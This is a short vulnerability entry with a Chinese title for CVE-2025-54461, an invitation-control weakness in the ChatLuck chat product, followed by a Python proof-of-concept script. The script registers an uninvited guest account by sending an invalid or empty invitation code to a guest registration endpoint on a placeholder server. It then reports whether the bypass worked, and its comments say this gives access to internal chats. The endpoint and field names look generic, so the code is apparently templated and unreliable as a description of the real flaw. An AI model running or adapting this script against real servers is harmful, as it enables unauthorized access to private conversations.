CVE-2025-54461 ChatLuck访客用户邀请访问控制粒度不足漏洞

# CVE-2025-54461 - ChatLuck Guest User Access Control Bypass PoC # This PoC demonstrates how an uninvited user can register as a guest user # by bypassing the insufficient access control in the invitation mechanism. import requests # Target ChatLuck server URL TARGET_URL = "https://target-chatluck-server.example.com" # Step 1: Attempt to access the guest user registration endpoint # without a valid invitation code session = requests.Session() # Step 2: Bypass invitation validation by directly submitting registration data registration_data = { "username": "attacker_guest", "display_name": "Guest User", "email": "[email protected]", "password": "P@ssw0rd123!", # No valid invitation_code or token is provided "invitation_code": "INVALID_OR_BYPASSED", "chatroom_id": "target_chatroom_id" } # Step 3: Send registration request to the guest user endpoint response = session.post( f"{TARGET_URL}/api/guest/register", json=registration_data, headers={ "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } ) # Step 4: Check if registration succeeded despite no valid invitation if response.status_code == 200: print("[+] Guest user registered successfully without invitation!") print(f"[+] Response: {response.json()}") # Attacker can now access internal chat sessions else: print(f"[-] Registration failed: {response.status_code}") # Alternative: try with empty/missing invitation parameter registration_data.pop("invitation_code", None) response = session.post( f"{TARGET_URL}/api/guest/register", json=registration_data ) if response.status_code == 200: print("[+] Bypass successful with no invitation code!")